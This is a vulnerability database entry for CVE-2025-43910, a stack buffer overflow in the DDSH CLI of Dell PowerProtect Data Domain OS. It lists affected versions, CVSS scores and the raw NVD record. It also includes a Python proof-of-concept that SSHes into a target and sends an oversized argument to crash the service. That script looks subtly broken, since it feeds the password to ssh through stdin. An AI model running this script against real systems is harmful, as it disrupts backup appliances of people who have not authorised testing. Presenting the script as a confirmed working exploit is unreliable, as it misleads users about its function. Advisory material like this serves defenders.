Security Vulnerability Report
中文
CVE-2025-43910 CVSS 2.3 LOW

CVE-2025-43910

Published: 2025-10-07 20:15:35
Last Modified: 2025-10-14 20:16:30
Source: [email protected]

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain a Stack-based Buffer Overflow vulnerability in the DDSH CLI. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service.

CVSS Details

CVSS Score
2.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 - 8.3.0.15
Dell PowerProtect Data Domain DD OS LTS2025 8.3.1.0
Dell PowerProtect Data Domain DD OS LTS2024 7.13.1.0 - 7.13.1.30
Dell PowerProtect Data Domain DD OS LTS2023 7.10.1.0 - 7.10.1.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43910 PoC - Dell PowerProtect Data Domain DDSH CLI Stack Buffer Overflow # This PoC demonstrates triggering a stack buffer overflow via DDSH CLI # Note: Requires local access and high privileges import subprocess import sys def trigger_overflow(host, username, password, buffer_size=8192): """ Trigger stack buffer overflow in DDSH CLI by sending oversized input. """ # Construct a payload that exceeds the expected buffer size payload = "A" * buffer_size # DDSH command with oversized argument ddsh_command = f"system show {payload}" # SSH command to connect to Data Domain and execute DDSH command ssh_command = [ "ssh", f"{username}@{host}", ddsh_command ] try: # Execute the command - this should trigger the overflow result = subprocess.run( ssh_command, input=password.encode() + b"\n", capture_output=True, timeout=30 ) print(f"Return code: {result.returncode}") print(f"Stderr: {result.stderr.decode('utf-8', errors='ignore')}") except subprocess.TimeoutExpired: print("[+] Possible DoS - command timed out (service may have crashed)") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: {sys.argv[0]} <host> <username> <password>") sys.exit(1) target_host = sys.argv[1] target_user = sys.argv[2] target_pass = sys.argv[3] print(f"[*] Targeting Dell Data Domain at {target_host}") print(f"[*] CVE-2025-43910 - DDSH CLI Stack Buffer Overflow") trigger_overflow(target_host, target_user, target_pass)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43910", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:34.850", "lastModified": "2025-10-14T20:16:29.623", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain a Stack-based Buffer Overflow vulnerability in the DDSH CLI. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.